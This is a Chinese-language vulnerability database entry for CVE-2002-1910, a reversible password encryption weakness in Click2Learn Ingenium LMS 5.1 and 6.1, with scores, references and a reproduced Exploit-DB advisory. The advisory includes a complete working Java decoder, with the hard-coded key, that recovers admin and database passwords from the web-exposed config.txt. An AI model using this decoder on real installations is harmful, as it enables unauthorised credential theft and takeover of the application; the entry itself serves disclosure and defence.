CVE-2002-1910
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:49
NMCOE    

[原文]Click2Learn Ingenium Learning Management System 5.1 and 6.1 uses weak encryption for passwords (reversible algorithm), which allows attackers to obtain passwords.


[CNNVD]Ingenium Learning Management System密码HASH可逆漏洞(CNNVD-200212-499)

        
        Ingenium Learning Management System是一款可扩展,100%基于WEB的应用程序,用于组织管理所有学习方面的内容。
        Ingenium Learning Management System使用了不强壮的算法对用户和管理密码进行加密,本地攻击者可以利用这个漏洞恢复管理和用户密码。
        Ingenium LMS系统使用了可逆的不强壮的加密算法,经过HASH的密码可以很容易的被攻击者破解,结合Ingenium LMS系统存在管理员密码可从WEB直接访问获得,攻击者就可以通过这两个漏洞获得管理员密码,从而控制整个LMS应用程序。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:click2learn:ingenium_learning_management_system:5.1
cpe:/a:click2learn:ingenium_learning_management_system:6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1910
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-499
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5970
(UNKNOWN)  BID  5970
http://www.iss.net/security_center/static/10389.php
(UNKNOWN)  XF  ingenium-weak-encryption(10389)

- 漏洞信息

Ingenium Learning Management System密码HASH可逆漏洞
中危 设计错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Ingenium Learning Management System是一款可扩展,100%基于WEB的应用程序,用于组织管理所有学习方面的内容。
        Ingenium Learning Management System使用了不强壮的算法对用户和管理密码进行加密,本地攻击者可以利用这个漏洞恢复管理和用户密码。
        Ingenium LMS系统使用了可逆的不强壮的加密算法,经过HASH的密码可以很容易的被攻击者破解,结合Ingenium LMS系统存在管理员密码可从WEB直接访问获得,攻击者就可以通过这两个漏洞获得管理员密码,从而控制整个LMS应用程序。
        

- 公告与补丁

        厂商补丁:
        Click2Learn
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://home.click2learn.com/

- 漏洞信息 (21942)

Ingenium Learning Management System 5.1/6.1 Reversible Password Hash Weakness (EDBID:21942)
multiple remote
2002-10-15 Verified
0 Brian Enigma
N/A [点击下载]
source: http://www.securityfocus.com/bid/5970/info

Ingenium Learning Management System uses a weak algorithm to hash user and administrative credentials. Passwords may be trivially obtained by reversing the password hash.

An attacker must be able to gain unauthorized access to the password hashes for this issue to be exploited. This may be achieved by taking advantage of the issue described in Bugtraq ID 5969. Hashed user credentials will also be stored in the database, and may potentially be retrieved by an attacker with the ability to construct or influence SQL queries.

import javax.swing.JOptionPane;

/**
 * IngeniumDecoder
 * Simple program to decode the admin password hash present in the Ingenium
 * LMS config.txt file.  This file is stored within the htdocs directory
 * tree, so is available through a simple URL.  For instance, if your
 * Ingenium install is in http://suffolk.click2learn.com/suffolk_test/, then
 * the config file is located at 
 * http://suffolk.click2learn.com/suffolk_test/config/config.txt.  The same
 * password hashing scheme is used both for the "administrator" login account
 * and the SQL database DSN password.
 *
 * @author  Brian Enigma <enigma@netninja.com>
 */
public class IngeniumDecoder {
    /** The low end of the keyspace */
    public static int WRAP_BOTTOM = 0x20; // space
    /** The high end of the keyspace */
    public static int WRAP_TOP    = 0x7E; // close curley brace
    public static int CHAR_ZERO   = 0x6E;
    /** The symmetric key */
    public static String KEY      = "9'$%100'%6";
    
    /** 
     * Given some cyphertext, produce the plaintext.  The encryption method
     * employed is a simple Caesar cypher with a key that rotates depending
     * on the position of the character in the plaintext/cyphertext.  The
     * offset is determined by the KEY string above.  (This is similar to
     * obfuscation using ROT-13 coding, only the "13" changes by position.)
     *
     *@param s the cyphertext
     *@return the plaintext
     */
    public static String decode(String s) {
        StringBuffer result = new StringBuffer();
        int max = s.length();
        for (int i=0; i<max; i++) {
            int cypherLetter = (int) s.charAt(i);
            int keyLetter = (int) KEY.charAt(i % KEY.length());
            if (cypherLetter == keyLetter)
                continue;
            int decodeLetter = cypherLetter - keyLetter;
            if (decodeLetter < WRAP_BOTTOM)
                decodeLetter = WRAP_TOP - (WRAP_BOTTOM - decodeLetter);
            if ((decodeLetter >= CHAR_ZERO) && (decodeLetter <= CHAR_ZERO+10))
                result.append(decodeLetter - CHAR_ZERO + Character.getNumericValue('0'));
            else if ((decodeLetter >= WRAP_BOTTOM) && (decodeLetter <= WRAP_TOP))
                result.append(Character.toString((char) decodeLetter));
            else
                result.append("[unknown letter]");
        }
        return result.toString();
    }
    
    /** Creates a new instance of IngeniumDecoder */
    private IngeniumDecoder() {
    }
    
    public static void main(String[] argv) {
        //System.out.println(decode("|smh|#'hp{9'$%10"));
        String hashedPass = JOptionPane.showInputDialog(
            null,
            "Please enter the \"hashed\" admin password from config.txt",
            "Enter hash",
            JOptionPane.QUESTION_MESSAGE);
        if ((hashedPass != null) && (hashedPass.length() > 0))
            JOptionPane.showMessageDialog(
                null, 
                "The decoded password is " + decode(hashedPass),
                "Plaintext",
                JOptionPane.INFORMATION_MESSAGE);
        System.exit(0);
    }
    
}
		

- 漏洞信息

59780
Click2Learn Ingenium Learning Management System Password Encryption Weakness
Local / Remote, Context Dependent Cryptographic
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-10-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站